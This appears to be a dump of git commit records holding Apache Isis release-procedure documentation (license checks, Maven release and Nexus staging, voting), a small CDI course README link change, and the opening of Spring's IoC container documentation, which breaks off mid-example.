'!AL' $a; done\n----\n\nwhere `rat.numUnapprovedLicenses` property is set to a high figure, temporarily overriding the default value of 0. This will allow the command to run over all submodules, rather than failing after the first one. The command writes out a `target\\rat.txt` for each submodule. missing license notes are indicated using the key `!???`. The `for` command collates all the errors.\n\nInvestigate and fix any reported violations, typically by either:\n\n* adding genuinely missing license headers from Java (or other) source files, or\n* updating the `<excludes>` element for the `apache-rat-plugin` plugin to ignore test files, log files and any other non-source code files\n* also look to remove any stale `<exclude>` entries\n\nTo add missing headers, use the groovy script `addmissinglicenses.groovy` (in the `scripts` directory) to automatically insert missing headers for certain file types. The actual files checked are those with extensions specified in the line `def fileEndings = [".java", ".htm"]`:\n\n[source,bash]\n----\ngroovy ..\/scripts\/addmissinglicenses.groovy -x\n----\n\n(If the `-x` is omitted then the script is run in \"dry run\" mode). Once you've fixed all issues, confirm once more that `apache-rat-plugin` no longer reports any license violations, this time leaving the `rat.numUnapprovedLicenses` property to its default, 0:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=0 -o && \\\nfor a in `find . -name rat.txt -print`; do grep '!???' $a; done\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_missing-license-check]]\n=== Missing License Check\n\nAlthough Apache Isis has no dependencies on artifacts with incompatible licenses, the POMs for some of these dependencies (in the Maven central repo) do not necessarily contain the required license information. Without appropriate additional configuration, this would result in the generated `DEPENDENCIES` file and generated Maven site indicating dependencies as having \"unknown\" licenses.\n\nFortunately, Maven allows the missing information to be provided by configuring the `maven-remote-resources-plugin`. This is stored in the `src\/main\/appended-resources\/supplemental-models.xml` file, relative to the root of each releasable module.\n\nTo capture the missing license information, use:\n\n[source,bash]\n----\nmvn license:download-licenses && \\\ngroovy ..\/scripts\/checkmissinglicenses.groovy\n----\n\nThe Maven plugin creates a `license.xml` file in the `target\/generated-resources` directory of each module. The script then searches for these `licenses.xml` files, and compares them against the contents of the `supplemental-models.xml` file.\n\nFor example, the output could be something like:\n\n[source,bash]\n----\nlicenses to add to supplemental-models.xml:\n\n[org.slf4j, slf4j-api, 1.5.7]\n[org.codehaus.groovy, groovy-all, 1.7.2]\n\nlicenses to remove from supplemental-models.xml (are spurious):\n\n[org.slf4j, slf4j-api, 1.5.2]\n----\n\nIf any missing entries are listed or are spurious, then update `supplemental-models.xml` and try again.\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_commit-changes]]\n=== Commit changes\n\nCommit any changes from the preceding steps:\n\n[source,bash]\n----\ngit commit -am \"$ISISJIRA: updates to pom.xml etc for release\"\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_sanity-check]]\n=== Sanity check\n\nPerform one last sanity check on the codebase. Delete all Isis artifacts from your local Maven repo, then build using the `-o` offline flag:\n\n[source,bash]\n----\nrm -rf ~\/.m2\/repository\/org\/apache\/isis\nmvn clean install -o\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-prepare-dry-run]]\n=== Release prepare \"dry run\"\n\nMost of the work is done using the `mvn release:prepare` goal. Since this makes a lot of changes, we run it first in \"dry run\" mode; only if that works do we run the goal for real.\n\nRun the dry-run as follows:\n\n[source,bash]\n----\nmvn release:prepare -P apache-release -D dryRun=true \\\n -DreleaseVersion=$ISISREL \\\n -Dtag=$ISISART-$ISISREL \\\n -DdevelopmentVersion=$ISISDEV\n----\n\nYou may be prompted for the gpg passphrase.\n\n[NOTE]\n====\nExperiments in using `--batch-mode -Dgpg.passphrase="..."` to fully automate this didn't work; for more info, see http:\/\/maven.apache.org\/plugins\/maven-gpg-plugin\/sign-mojo.html[here] (maven release plugin docs) and http:\/\/maven.apache.org\/maven-release\/maven-release-plugin\/examples\/non-interactive-release.html[here] (maven gpg plugin docs).\n====\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-prepare-proper]]\n=== Release prepare \"proper\"\n\nAssuming this completes successfully, re-run the command, but without the `dryRun` flag and specifying `resume=false` (to ignore the generated `release.properties` file that gets generated as a side-effect of using `git`). You can also set the `skipTests` flag since they would have been run during the previous dry run:\n\n[source,bash]\n----\nmvn release:prepare -P apache-release -D resume=false -DskipTests=true \\\n -DreleaseVersion=$ISISREL \\\n -Dtag=$ISISART-$ISISREL \\\n -DdevelopmentVersion=$ISISDEV\n----\n\n\n[TIP]\n====\nIf there are any snags at this stage, then explicitly delete the generated `release.properties` file first before trying again.\n====\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_post-prepare-sanity-check]]\n=== Post-prepare sanity check\n\nYou should end up with artifacts in your local repo with the new version (eg `1.14.0`). This is a good time to do some quick sanity checks; nothing has yet been uploaded:\n\n* unzip the source-release ZIP and check it builds.\n* Inspect the `DEPENDENCIES` file, and check it looks correct.\n\nThese steps can be performed using the following script:\n\n[source]\n----\nrm -rf $ISISTMP\/$ISISART-$ISISREL\nmkdir $ISISTMP\/$ISISART-$ISISREL\n\nif [ \"$ISISCOR\" == \"Y\" ]; then\n ZIPDIR=\"$M2_REPO\/repository\/org\/apache\/isis\/core\/$ISISART\/$ISISREL\"\nelse\n ZIPDIR=\"$M2_REPO\/repository\/org\/apache\/isis\/$ISISCPT\/$ISISART\/$ISISREL\"\nfi\necho \"cp \\\"$ZIPDIR\/$ISISART-$ISISREL-source-release.zip\\\" $ISISTMP\/$ISISART-$ISISREL\/.\"\ncp \"$ZIPDIR\/$ISISART-$ISISREL-source-release.zip\" $ISISTMP\/$ISISART-$ISISREL\/.\n\npushd $ISISTMP\/$ISISART-$ISISREL\nunzip $ISISART-$ISISREL-source-release.zip\n\ncd $ISISART-$ISISREL\nmvn clean install\n\ncat DEPENDENCIES\n\npopd\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-perform-upload]]\n=== Release perform (Upload)\n\nOnce the release has been built locally, it should be uploaded for voting. This is done by deploying the Maven artifacts to a staging directory (this includes the source release ZIP file which will be voted upon).\n\nThe Apache staging repository runs on Nexus server, hosted at https:\/\/repository.apache.org[repository.apache.org]. The process of uploading will create a staging repository that is associated with the host (IP address) performing the release. Once the repository is staged, the newly created staging repository is \"closed\" in order to make it available to others.\n\nUse:\n\n[source,bash]\n----\nmvn release:perform -P apache-release \\\n -DworkingDirectory=$ISISTMP\/$ISISART-$ISISREL\/checkout\n----\n\nThe custom `workingDirectory` prevents file path issues if releasing on Windows. The command checks out the codebase from the tag, then builds the artifacts, then uploads them to the Apache staging repository:\n\n[source,bash]\n----\n...\n[INFO] --- maven-release-plugin:2.3.2:perform (default-cli) @ isis ---\n[INFO] Performing a LOCAL checkout from scm:git:file:\/\/\/C:\\APACHE\\isis-git-rw\\co\nre\n[INFO] Checking out the project to perform the release ...\n[INFO] Executing: cmd.exe \/X \/C \"git clone --branch release-1.14.0 file:\/\/\/C:\\APACHE\\isis-git-rw\\core C:\\APACHE\\isis-git-rw\\core\\target\\checkout\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\n[INFO] Performing a LOCAL checkout from scm:git:file:\/\/\/C:\\APACHE\\isis-git-rw\n[INFO] Checking out the project to perform the release ...\n[INFO] Executing: cmd.exe \/X \/C \"git clone --branch release-1.14.0 file:\/\/\/C:\\APACHE\\isis-git-rw C:\\APACHE\\isis-git-rw\\core\\target\\checkout\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\n[INFO] Executing: cmd.exe \/X \/C \"git ls-remote file:\/\/\/C:\\APACHE\\isis-git-rw\"\n[INFO] Working directory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\n[INFO] Executing: cmd.exe \/X \/C \"git fetch file:\/\/\/C:\\APACHE\\isis-git-rw\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Executing: cmd.exe \/X \/C \"git checkout release-1.14.0\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Executing: cmd.exe \/X \/C \"git ls-files\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Invoking perform goals in directory C:\\APACHE\\isis-git-rw\\core\\target\\checkout\\core\n[INFO] Executing goals 'deploy'...\n...\n----\n\nYou may (again) be prompted for gpg passphrase. All being well this command will complete successfully. Given that it is uploading code artifacts, it could take a while to complete.\n\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype]]\n== Releasing the Archetype\n\nApache Isis archetypes are reverse engineered from example applications. Once reverse engineered, the source is checked into git (replacing any earlier version of the archetype) and released.\n\nSwitch to the directory containing the `simpleapp` example:\n\n[source,bash]\n----\ncd ..\/example\/application\/simpleapp\n----\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_setup-environment-variables]]\n=== Setup environment variables\n\nSet additional environment variables for the `simpleapp-archetype` artifact:\n\n[source,bash]\n----\nexport ISISART=simpleapp-archetype\nexport ISISPAR=$ISISREL # <1>\n\nexport ISISCPT=$(echo $ISISART | cut -d- -f2)\nexport ISISCPN=$(echo $ISISART | cut -d- -f1)\n\nenv | grep ISIS | sort\n----\n<1> `$ISISPAR` is the version of the Apache Isis core that will act as the archetype's parent. Usually this is the same as `$ISISREL`.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_check-the-example-app]]\n=== Check the example app\n\nUpdate the parent `pom.xml` to reference the _released_ version of Apache Isis core, eg:\n\n[source,xml]\n----\n<properties>\n <isis.version>1.14.0<\/isis.version>\n ...\n<\/properties>\n----\n\n\n\nCheck for and fix any missing license header notices:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=50 -o && \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done || \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!AL' $a; done\n----\n\n\nFinally, double check that the app\n\n* builds:\n+\n[source,bash]\n----\nmvn clean install\n----\n\n* can be run from an IDE\n** mainClass=`org.apache.isis.WebServer`\n** args=`-m domainapp.app.DomainAppAppManifestWithFixtures`\n\n* can be run using the mvn jetty plugin:\n+\n[source,bash]\n----\npushd webapp\nmvn jetty:run\npopd\n----\n\n* can be deployed as a WAR\n+\n[source,bash]\n----\ncp webapp\/target\/simpleapp.war $CATALINA_HOME\/webapps\/ROOT.war\npushd $CATALINA_HOME\/bin\nsh startup.sh\ntail -f ..\/logs\/catalina.out\n----\n+\nquit using:\n+\n[source,bash]\n----\nsh shutdown.sh\npopd\n----\n\nIn each case, check the about page and confirm has been built against non-SNAPSHOT versions of the Apache Isis jars.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_create-the-archetype]]\n=== Create the archetype\n\nMake sure you are in the correct directory and environment variables are correct.\n\nTo recreate the *simpleapp* archetype:\n\n[source,bash]\n----\ncd example\/application\/simpleapp\nenv | grep ISIS | sort\n----\n\nThen, run the script:\n\n[source,bash]\n----\nsh ..\/..\/..\/scripts\/recreate-archetype.sh $ISISJIRA\n----\n\nThe script automatically commits changes; if you wish use `git log` and\n`git diff` (or a tool such as SourceTree) to review changes made.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_release-prepare]]\n=== Release prepare\n\nSwitch to the *archetype* directory and execute the `release:prepare`:\n\n[source]\n----\ncd ..\/..\/..\/example\/archetype\/$ISISCPN\nrm -rf $ISISTMP\/checkout\nmvn release:prepare -P apache-release \\\n -DreleaseVersion=$ISISREL \\\n -DdevelopmentVersion=$ISISDEV \\\n -Dtag=$ISISART-$ISISREL\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_post-prepare-sanity-check]]\n=== Post-prepare sanity check\n\nThis is a good point to test the archetype; nothing has yet been uploaded.\n\n_In a different session_, create a new app from the archetype. First set up environment variables:\n\n[source,bash]\n----\nexport ISISTMP=\/c\/tmp # or as required\nexport ISISCPN=simpleapp\nenv | grep ISIS | sort\n----\n\nThen generate a new app from the archetype:\n\n[source,bash]\n----\nrm -rf $ISISTMP\/test-$ISISCPN\n\nmkdir $ISISTMP\/test-$ISISCPN\ncd $ISISTMP\/test-$ISISCPN\nmvn archetype:generate \\\n -D archetypeCatalog=local \\\n -D groupId=com.mycompany \\\n -D artifactId=myapp \\\n -D archetypeGroupId=org.apache.isis.archetype \\\n -D archetypeArtifactId=$ISISCPN-archetype\n----\n\nBuild the newly generated app and test:\n\n[source,bash]\n----\ncd myapp\nmvn clean install\ncd webapp\nmvn jetty:run # runs as mvn jetty plugin\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_release-perform-upload]]\n=== Release Perform (upload)\n\nBack in the original session (in the *archetype* directory, `example\/archetype\/$ISISCPN`), execute `release:perform`:\n\n[source]\n----\nmvn release:perform -P apache-release \\\n -DworkingDirectory=$ISISTMP\/checkout\n----\n\nThis will upload the artifacts to the ASF Nexus repository.\n\n\n[[_cgcom_cutting-a-release_check-close-staging-repo]]\n== Check\/Close Staging Repo\n\nThe `mvn release:perform` commands will have put release artifacts for both `core` and the `simpleapp` archetype into a newly created staging repository on the ASF Nexus repository server.\n\nLog onto http:\/\/repository.apache.org[repository.apache.org] (using your ASF LDAP account):\n\nimage::{_imagesdir}release-process\/nexus-staging-0.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-0.png\"]\n\nAnd then check that the release has been staged (select `staging repositories` from left-hand side):\n\nimage::{_imagesdir}release-process\/nexus-staging-1.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-1.png\"]\n\nIf nothing appears in a staging repo you should stop here and work out why.\n\nAssuming that the repo has been populated, make a note of its repo id; this is needed for the voting thread. In the screenshot above the id is `org.apache.isis-008`.\n\n\nAfter checking that the staging repository contains the artifacts that you expect you should close the staging repository. This will make it available so that people can check the release.\n\nPress the Close button and complete the dialog:\n\nimage::{_imagesdir}release-process\/nexus-staging-2.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-2.png\"]\n\nNexus should start the process of closing the repository.\n\nimage::{_imagesdir}release-process\/nexus-staging-2a.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-2a.png\"]\n\nAll being well, the close should (eventually) complete successfully (keep hitting refresh):\n\nimage::{_imagesdir}release-process\/nexus-staging-3.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-3.png\"]\n\nThe Nexus repository manager will also email you with confirmation of a successful close.\n\nIf Nexus has problems with the key signature, however, then the close will be aborted:\n\nimage::{_imagesdir}release-process\/nexus-staging-4.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-4.png\"]\n\nUse `gpg --keyserver hkp:\/\/pgp.mit.edu --recv-keys nnnnnnnn` to confirm that the key is available.\n\n\n[NOTE]\n====\nUnfortunately, Nexus does not seem to allow subkeys to be used for signing. See xref:cgcom.adoc#_cgcom_key-generation[Key Generation] for more details.\n====\n\n\n\n[[_cgcom_cutting-a-release_push-branches]]\n== Push branches\n\nPush the release branch to origin:\n\n[source,bash]\n----\ngit push -u origin $ISISBRANCH\n----\n\nand also push tags for both core and the archetype:\n\n[source]\n----\ngit push origin refs\/tags\/isis-$ISISREL:refs\/tags\/isis-$ISISREL-$ISISRC\ngit push origin refs\/tags\/simpleapp-archetype-$ISISREL:refs\/tags\/simpleapp-archetype-$ISISREL-$ISISRC\ngit fetch\n----\n\n[NOTE]\n====\nThe remote tag isn't visible locally but can be seen https:\/\/git-wip-us.apache.org\/repos\/asf\/isis\/repo?p=isis.git;a=summary[online].\n====\n\n\n\n[[_cgcom_cutting-a-release_voting]]\n== Voting\n\nOnce the artifacts have been uploaded, you can call a vote.\n\nIn all cases, votes last for 72 hours and require a +3 (binding) vote from members.\n\n[[_cgcom_cutting-a-release_voting-start-voting-thread]]\n=== Start voting thread on link:mailto:dev@isis.apache.org[dev@isis.apache.org]\n\nThe following boilerplate is for a release of the Apache Isis Core. Adapt as required:\n\nUse the following subject, eg:\n\n[source,bash]\n----\n[VOTE] Apache Isis Core release 1.14.0 RC1\n----\n\nAnd use the following body:\n\n[source,bash]\n----\nI've cut a release for Apache Isis Core and the simpleapp archetype:\n\n* Core 1.14.0\n* SimpleApp Archetype 1.14.0\n\nThe source code artifacts have been uploaded to staging repositories on repository.apache.org:\n\n* http:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/core\/isis\/1.14.0\/isis-1.14.0-source-release.zip\n* http:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/archetype\/simpleapp-archetype\/1.14.0\/simpleapp-archetype-1.14.0-source-release.zip\n\nFor each zip there is a corresponding signature file (append .asc to the zip's url).\n\nIn the source code repo the code has been tagged as isis-1.14.0-RC1 and simpleapp-archetype-1.14.0-RC1; see https:\/\/git-wip-us.apache.org\/repos\/asf?p=isis.git\n\nFor instructions on how to verify the release (build from binaries and\/or use in Maven directly), see http:\/\/isis.apache.org\/guides\/cgcom.html#_cgcom_verifying-releases\n\nPlease verify the release and cast your vote. The vote will be open for a minimum of 72 hours.\n\n[ ] +1\n[ ] 0\n[ ] -1\n----\n\nRemember to update:\n\n* the version number (1.14.0 or whatever)\n* the release candidate number (`RC1` or whatever)\n* the repository id, as provided by Nexus earlier (`orgapacheisis-10xx` or whatever)\n\nNote that the email also references the procedure for other committers to xref:cgcom.adoc#_cgcom_verifying-releases[verify the release].\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c48b4d4126fbf5bdbac91c517037b4e0b057e0e6","subject":"Link (direct) to pres","message":"Link (direct) to pres\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"CDI\/README.adoc","new_file":"CDI\/README.adoc","new_contents":"= CDI\n\nSee: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Git\/Pr%C3%A9sentation\/presentation.pdf[Pr\u00e9sentation].\n\nHere are some references about CDI (Context Dependency Injection).\n\n* The Java EE Tutorial: http:\/\/docs.oracle.com\/javaee\/7\/tutorial\/partcdi.htm[Contexts and Dependency Injection]\n* Goncalves - Beginning Java EE 7 (2013)\n* https:\/\/jcp.org\/en\/jsr\/detail?id=346[JSR 346] (Context and Dependency Injection 1.1 and 1.2) (http:\/\/download.oracle.com\/otn-pub\/jcp\/cdi-1_2-mrel-eval-spec\/cdi-1.2.pdf[PDF])\n* https:\/\/jcp.org\/en\/jsr\/detail?id=330[JSR 330] (Dependency Injection) (http:\/\/download.oracle.com\/otn-pub\/jcp\/dependency_injection-1.0-final-oth-JSpec\/dependency_injection-1_0-final-spec.zip[zip]): only doc about http:\/\/docs.oracle.com\/javaee\/7\/api\/javax\/inject\/Inject.html[`@Inject`] and similar\n* JSR 330, https:\/\/jcp.org\/en\/jsr\/detail?id=330#4[section 4]: short description of the utility of DI\n* https:\/\/jcp.org\/en\/jsr\/detail?id=342[JSR 342] (Java EE 7) (http:\/\/download.oracle.com\/otn-pub\/jcp\/java_ee-7-mrel-eval-spec\/JavaEE_Platform_Spec.pdf[PDF])\n* https:\/\/jcp.org\/en\/jsr\/detail?id=345[JSR 345] (EJB 3.2) (http:\/\/download.oracle.com\/otn-pub\/jcp\/ejb-3_2-fr-eval-spec\/ejb-3_2-core-fr-spec.pdf[PDF])\n\n","old_contents":"= CDI\n\nSee: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Pr%C3%A9sentation\/presentation.pdf[Pr\u00e9sentation].\n\nHere are some references about CDI (Context Dependency Injection).\n\n* The Java EE Tutorial: http:\/\/docs.oracle.com\/javaee\/7\/tutorial\/partcdi.htm[Contexts and Dependency Injection]\n* Goncalves - Beginning Java EE 7 (2013)\n* https:\/\/jcp.org\/en\/jsr\/detail?id=346[JSR 346] (Context and Dependency Injection 1.1 and 1.2) (http:\/\/download.oracle.com\/otn-pub\/jcp\/cdi-1_2-mrel-eval-spec\/cdi-1.2.pdf[PDF])\n* https:\/\/jcp.org\/en\/jsr\/detail?id=330[JSR 330] (Dependency Injection) (http:\/\/download.oracle.com\/otn-pub\/jcp\/dependency_injection-1.0-final-oth-JSpec\/dependency_injection-1_0-final-spec.zip[zip]): only doc about http:\/\/docs.oracle.com\/javaee\/7\/api\/javax\/inject\/Inject.html[`@Inject`] and similar\n* JSR 330, https:\/\/jcp.org\/en\/jsr\/detail?id=330#4[section 4]: short description of the utility of DI\n* https:\/\/jcp.org\/en\/jsr\/detail?id=342[JSR 342] (Java EE 7) (http:\/\/download.oracle.com\/otn-pub\/jcp\/java_ee-7-mrel-eval-spec\/JavaEE_Platform_Spec.pdf[PDF])\n* https:\/\/jcp.org\/en\/jsr\/detail?id=345[JSR 345] (EJB 3.2) (http:\/\/download.oracle.com\/otn-pub\/jcp\/ejb-3_2-fr-eval-spec\/ejb-3_2-core-fr-spec.pdf[PDF])\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"69116c2acc3881040686da594ced49cb9a964eb5","subject":"Documentation for InjectionPoint argument on @Bean method","message":"Documentation for InjectionPoint argument on @Bean method\n\nIssue: SPR-14797\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/core-beans.adoc","new_file":"src\/asciidoc\/core-beans.adoc","new_contents":"[[beans]]\n= The IoC container\n\n\n[[beans-introduction]]\n== Introduction to the Spring IoC container and beans\nThis chapter covers the Spring Framework implementation of the Inversion of Control\n(IoC) footnote:[See pass:specialcharacters,macros[<<background-ioc>>] ] principle. IoC\nis also known as __dependency injection__ (DI). It is a process whereby objects define\ntheir dependencies, that is, the other objects they work with, only through constructor\narguments, arguments to a factory method, or properties that are set on the object\ninstance after it is constructed or returned from a factory method. The container then\n__injects__ those dependencies when it creates the bean. This process is fundamentally\nthe inverse, hence the name __Inversion of Control__ (IoC), of the bean itself\ncontrolling the instantiation or location of its dependencies by using direct\nconstruction of classes, or a mechanism such as the __Service Locator__ pattern.\n\nThe `org.springframework.beans` and `org.springframework.context` packages are the basis\nfor Spring Framework's IoC container. The\n{api-spring-framework}\/beans\/factory\/BeanFactory.html[`BeanFactory`]\ninterface provides an advanced configuration mechanism capable of managing any type of\nobject.\n{api-spring-framework}\/context\/ApplicationContext.html[`ApplicationContext`]\nis a sub-interface of `BeanFactory`. It adds easier integration with Spring's AOP\nfeatures; message resource handling (for use in internationalization), event\npublication; and application-layer specific contexts such as the `WebApplicationContext`\nfor use in web applications.\n\nIn short, the `BeanFactory` provides the configuration framework and basic\nfunctionality, and the `ApplicationContext` adds more enterprise-specific functionality.\nThe `ApplicationContext` is a complete superset of the `BeanFactory`, and is used\nexclusively in this chapter in descriptions of Spring's IoC container. For more\ninformation on using the `BeanFactory` instead of the `ApplicationContext,` refer to\n<<beans-beanfactory>>.\n\nIn Spring, the objects that form the backbone of your application and that are managed\nby the Spring IoC __container__ are called __beans__. A bean is an object that is\ninstantiated, assembled, and otherwise managed by a Spring IoC container. Otherwise, a\nbean is simply one of many objects in your application. Beans, and the __dependencies__\namong them, are reflected in the __configuration metadata__ used by a container.\n\n\n\n\n[[beans-basics]]\n== Container overview\nThe interface `org.springframework.context.ApplicationContext` represents the Spring IoC\ncontainer and is responsible for instantiating, configuring, and assembling the\naforementioned beans. The container gets its instructions on what objects to\ninstantiate, configure, and assemble by reading configuration metadata. The\nconfiguration metadata is represented in XML, Java annotations, or Java code. It allows\nyou to express the objects that compose your application and the rich interdependencies\nbetween such objects.\n\nSeveral implementations of the `ApplicationContext` interface are supplied\nout-of-the-box with Spring. In standalone applications it is common to create an\ninstance of\n{api-spring-framework}\/context\/support\/ClassPathXmlApplicationContext.html[`ClassPathXmlApplicationContext`]\nor {api-spring-framework}\/context\/support\/FileSystemXmlApplicationContext.html[`FileSystemXmlApplicationContext`].\n While XML has been the traditional format for defining configuration metadata you can\ninstruct the container to use Java annotations or code as the metadata format by\nproviding a small amount of XML configuration to declaratively enable support for these\nadditional metadata formats.\n\nIn most application scenarios, explicit user code is not required to instantiate one or\nmore instances of a Spring IoC container. For example, in a web application scenario, a\nsimple eight (or so) lines of boilerplate web descriptor XML in the `web.xml` file\nof the application will typically suffice (see <<context-create>>). If you are using the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite] Eclipse-powered development\nenvironment this boilerplate configuration can be easily created with few mouse clicks or\nkeystrokes.\n\nThe following diagram is a high-level view of how Spring works. Your application classes\nare combined with configuration metadata so that after the `ApplicationContext` is\ncreated and initialized, you have a fully configured and executable system or\napplication.\n\n.The Spring IoC container\nimage::images\/container-magic.png[width=250]\n\n\n\n[[beans-factory-metadata]]\n=== Configuration metadata\n\nAs the preceding diagram shows, the Spring IoC container consumes a form of\n__configuration metadata__; this configuration metadata represents how you as an\napplication developer tell the Spring container to instantiate, configure, and assemble\nthe objects in your application.\n\nConfiguration metadata is traditionally supplied in a simple and intuitive XML format,\nwhich is what most of this chapter uses to convey key concepts and features of the\nSpring IoC container.\n\n[NOTE]\n====\nXML-based metadata is __not__ the only allowed form of configuration metadata. The\nSpring IoC container itself is __totally__ decoupled from the format in which this\nconfiguration metadata is actually written. These days many developers choose\n<<beans-java,Java-based configuration>> for their Spring applications.\n====\n\nFor information about using other forms of metadata with the Spring container, see:\n\n* <<beans-annotation-config,Annotation-based configuration>>: Spring 2.5 introduced\n support for annotation-based configuration metadata.\n* <<beans-java,Java-based configuration>>: Starting with Spring 3.0, many features\n provided by the Spring JavaConfig project became part of the core Spring Framework.\n Thus you can define beans external to your application classes by using Java rather\n than XML files. To use these new features, see the `@Configuration`, `@Bean`, `@Import`\n and `@DependsOn` annotations.\n\nSpring configuration consists of at least one and typically more than one bean\ndefinition that the container must manage. XML-based configuration metadata shows these\nbeans configured as `<bean\/>` elements inside a top-level `<beans\/>` element. Java\nconfiguration typically uses `@Bean` annotated methods within a `@Configuration` class.\n\nThese bean definitions correspond to the actual objects that make up your application.\nTypically you define service layer objects, data access objects (DAOs), presentation\nobjects such as Struts `Action` instances, infrastructure objects such as Hibernate\n`SessionFactories`, JMS `Queues`, and so forth. Typically one does not configure\nfine-grained domain objects in the container, because it is usually the responsibility\nof DAOs and business logic to create and load domain objects. However, you can use\nSpring's integration with AspectJ to configure objects that have been created outside\nthe control of an IoC container. See <<aop-atconfigurable,Using AspectJ to\ndependency-inject domain objects with Spring>>.\n\nThe following example shows the basic structure of XML-based configuration metadata:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"...\" class=\"...\">\n\t\t\t<!-- collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<bean id=\"...\" class=\"...\">\n\t\t\t<!-- collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions go here -->\n\n\t<\/beans>\n----\n\nThe `id` attribute is a string that you use to identify the individual bean definition.\nThe `class` attribute defines the type of the bean and uses the fully qualified\nclassname. The value of the id attribute refers to collaborating objects. The XML for\nreferring to collaborating objects is not shown in this example; see\n<<beans-dependencies,Dependencies>> for more information.\n\n\n\n[[beans-factory-instantiation]]\n=== Instantiating a container\n\nInstantiating a Spring IoC container is straightforward. The location path or paths\nsupplied to an `ApplicationContext` constructor are actually resource strings that allow\nthe container to load configuration metadata from a variety of external resources such\nas the local file system, from the Java `CLASSPATH`, and so on.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tApplicationContext context =\n\t\tnew ClassPathXmlApplicationContext(new String[] {\"services.xml\", \"daos.xml\"});\n----\n\n[NOTE]\n====\nAfter you learn about Spring's IoC container, you may want to know more about Spring's\n`Resource` abstraction, as described in <<resources>>, which provides a convenient\nmechanism for reading an InputStream from locations defined in a URI syntax. In\nparticular, `Resource` paths are used to construct applications contexts as described in\n<<resources-app-ctx>>.\n====\n\nThe following example shows the service layer objects `(services.xml)` configuration file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- services -->\n\n\t\t<bean id=\"petStore\" class=\"org.springframework.samples.jpetstore.services.PetStoreServiceImpl\">\n\t\t\t<property name=\"accountDao\" ref=\"accountDao\"\/>\n\t\t\t<property name=\"itemDao\" ref=\"itemDao\"\/>\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions for services go here -->\n\n\t<\/beans>\n----\n\nThe following example shows the data access objects `daos.xml` file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean 